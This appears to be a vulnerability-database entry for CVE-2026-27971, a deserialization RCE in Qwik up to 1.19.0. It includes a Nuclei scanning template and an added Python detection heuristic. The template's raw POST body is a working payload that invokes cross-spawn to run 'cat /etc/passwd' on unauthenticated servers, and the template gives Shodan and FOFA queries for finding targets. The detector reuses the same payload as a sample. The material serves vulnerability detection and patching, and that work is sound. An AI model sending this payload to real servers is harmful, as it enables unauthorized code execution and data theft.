Qwik - Unauthenticated RCE via server$ Deserialization
CVE-2026-27971
Verified
Description
Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism that lets unauthenticated attackers execute arbitrary code remotely; the exploit requires require() to be available at runtime.
Severity
Critical
CVSS Score
9.2
Exploit Probability
23%
Published Date
March 4, 2026
Template Author
omarkurt
CVE-2026-27971.yaml
id: CVE-2026-27971

info:
  name: Qwik - Unauthenticated RCE via server$ Deserialization
  author: omarkurt
  severity: critical
  description: |
    Qwik <=1.19.0 contains an insecure deserialization vulnerability in the server$ RPC mechanism that lets unauthenticated attackers execute arbitrary code remotely; the exploit requires require() to be available at runtime.
  impact: |
    Unauthenticated attackers can execute arbitrary code on the server, leading to full system compromise.
  remediation: |
    Update to version 1.19.1 or later.
  reference:
    - https://github.com/QwikDev/qwik/security/advisories/GHSA-p9x5-jp3h-96mm
    - https://vulnerabletarget.com/VT-2026-27971
  classification:
    cvss-metrics: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
    cvss-score: 9.2
    cve-id: CVE-2026-27971
    epss-score: 0.23118
    epss-percentile: 0.95903
    cwe-id: CWE-502
  metadata:
    max-request: 1
    verified: true
    shodan-query: http.html:"q:version"
    fofa-query: body="q:version"
  tags: cve,cve2026,qwik,rce,deserialization,vkev

http:
  - raw:
      - |
        POST /?qfunc=sync HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/qwik-json
        X-QRL: sync
        Origin: {{RootURL}}

        {"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}

    matchers:
      - type: dsl
        dsl:
          - "regex('root:.*:0:0:', body)"
          - "status_code == 200"
          - "contains(header, 'application/qwik-json')"
        condition: and
# digest: 4a0a0047304502205ce4d88fd786beefe5d402838834c5af7b243bdc398a0e1124dec6417275b2b9022100d1c221044409638ce9fc6a12a2b2f61f149d932fa190b5933f082050f553bfa4:922c64590222798bb761d5b6d8e72950
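Added example, not part of the Nuclei template or the Qwik project: a detection heuristic for the request shape the template above sends. It parses qwik-json bodies and flags server$ calls whose serialized object graph references a module outside the application's own build output. The allowed prefix ./build/ and the sample requests (the first reuses the template's probe body, the others are constructed) are assumptions.

```python
import json

# Constructed samples (not captured traffic): (request_line, content_type, body).
# The first body is the probe from the template above; the second is a constructed
# benign-looking call that references the app's own build chunk.
SAMPLE_REQUESTS = [
    ("POST /?qfunc=sync HTTP/1.1", "application/qwik-json",
     r'{"_objs":["\u0002./node_modules/cross-spawn/index#sync","cat","/etc/passwd",["2"],["0","1","3"]],"_entry":"4"}'),
    ("POST /?qfunc=s_abc123 HTTP/1.1", "application/qwik-json",
     r'{"_objs":["\u0002./build/q-abc123.js#s_abc123","hello",["1"]],"_entry":"2"}'),
    ("GET /about HTTP/1.1", "text/html", ""),
]

# Assumption: this deployment serves its own QRL chunks only from ./build/.
ALLOWED_MODULE_PREFIX = "./build/"


def qrl_refs(body):
    """Return module references (entries beginning with U+0002) from a qwik-json body."""
    try:
        data = json.loads(body)
    except ValueError:
        return []
    objs = data.get("_objs", []) if isinstance(data, dict) else []
    return [o[1:] for o in objs if isinstance(o, str) and o.startswith("\x02")]


def is_suspicious(content_type, body):
    """Flag qwik-json bodies whose QRL references leave the allowed chunk directory."""
    if "application/qwik-json" not in content_type:
        return False
    for ref in qrl_refs(body):
        module = ref.split("#", 1)[0]  # drop the exported symbol name
        if "node_modules" in module or not module.startswith(ALLOWED_MODULE_PREFIX):
            return True
    return False


def scan(requests):
    """Return the request line of every sample that trips the heuristic."""
    return [line for line, ctype, body in requests if is_suspicious(ctype, body)]


if __name__ == "__main__":
    for hit in scan(SAMPLE_REQUESTS):
        print("suspicious server$ call:", hit)
```

A hit is a reason to inspect the request and confirm the deployed Qwik version, not proof of compromise on its own; the prefix check must be adjusted to where a given build actually emits its chunks.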
CVSS Metrics
CVSS Vector:
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
CVE ID:
cve-2026-27971
CWE ID:
cwe-502
Remediation Steps
Update to version 1.19.1 or later.